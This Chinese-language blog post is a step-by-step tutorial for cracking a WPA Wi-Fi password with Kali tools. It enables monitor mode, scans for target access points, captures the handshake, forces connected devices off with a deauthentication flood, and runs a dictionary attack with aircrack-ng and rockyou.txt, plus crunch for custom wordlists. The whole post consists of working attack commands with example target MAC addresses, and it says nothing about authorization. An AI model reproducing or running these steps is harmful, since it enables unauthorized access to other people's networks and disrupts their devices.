Home Kali暴力破解wifi密码
Post
Cancel

Kali暴力破解wifi密码

查看本机网卡名称

1
ifconfig
  • eth0有线网卡
  • wlan0无线网卡

虚拟机无法访问网卡,所以需要使用外接的USB无线网卡。

查看是否支持监听模式

1
airmon-ng

如果该命令没有任何输出则表示没有可以支持监听模式的网卡。

开启无线网卡的监听模式

1
airmon-ng start wlan0

如果airmon-ng显示的是wifi0,就把wlan0改为wifi0,这时候再输入ifconfig,会发现wlan0变为了wlan0mon,这表明网卡监听模式已开启。

搜索附近的WiFi

1
airodump-ng wlan0mon

使用airodump-ng命令列出无线网卡扫描到的WiFi热点详细信息,包括信号强度,加密类型,信道等,BSSID为MAC地址,PWR为信号强度(越小信号越强),CH为信道,#DATA为数据量,越大使用的人就越多。这里我们记下要破解WiFi的BSSID和信道。当搜索到我们想要破解的WiFi热点时可以Ctrl+C停止搜索。

抓取握手包

使用网卡的监听模式抓取周围的无线网络数据包,其中我们需要用到的数据包是包含了WiFi密码的握手包,当有新用户连接WiFi时会发送握手包。

1
airodump-ng -c 10 --bssid D4:EE:07:12:57:80 -w ~/ wlan0mon
  • -c指定信道
  • -bssid指定目标路由器的BSSID
  • -w指定抓取数据包保存的目录

强制连接到wifi的设备重连路由器

现在我们使用aireplay-ng命令给连接到wifi的设备发送一个反认证包,使设备强制断开连接,随后它会自动再次连接wifi,这个自动连接过程会进行三次握手,会发送TCP包(里面包含加密的密码数据)。不难看出,airplay-ng生效的前提是WiFi热点中必须至少已经接入一个设备。由于刚刚打开的终端一直在执行抓包工作,所以我们重新打开一个终端,输入命令。

1
aireplay-ng -0 5 -a D4:EE:07:12:57:80 -c AC:CF:85:B6:81 wlan0mon
  • -a指定目标路由器的BSSID
  • -c指定要攻击设备的MAC地址
  • -0为用deauth洪水攻击WiFi设备的次数,-0 0为无限,-0 5则攻击5次

结束无线网卡的监听模式

此时返回前一个终端,当窗口右上角出现WPA handshake时说明抓包成功,这个时候使用Ctrl+C命令停止抓包,同时结束无线网卡的监听模式。

1
airmon-ng stop wlan0mon

解压字典文件

Kali本身就有字典文件,我们把它解压出来。

1
gzip -d /usr/share/wordlists/rockyou.txt.gz

暴力破解

上面已经成功抓取到了握手包,现在要做的工作就是将握手包的密码和字典文件中的密码进行匹配。

1
aircrack-ng -w /usr/share/wordlist/rockyou.txt ~/*.cap
  • -w字典路径 握手包路径

生成字典文件

如果Kali自带的字典文件不够用,可以通过crunch自己制作字典。

1
crunch 10 10 012 xy > /root/12345.txt 
  • 10 10表示制作一个10位数的密码
  • 012 xy表示密码中包含数字012、xy这些元素
  • /root/12345.txt表示密码文本储存的路径以及名字
This post is licensed under CC BY 4.0 by the author.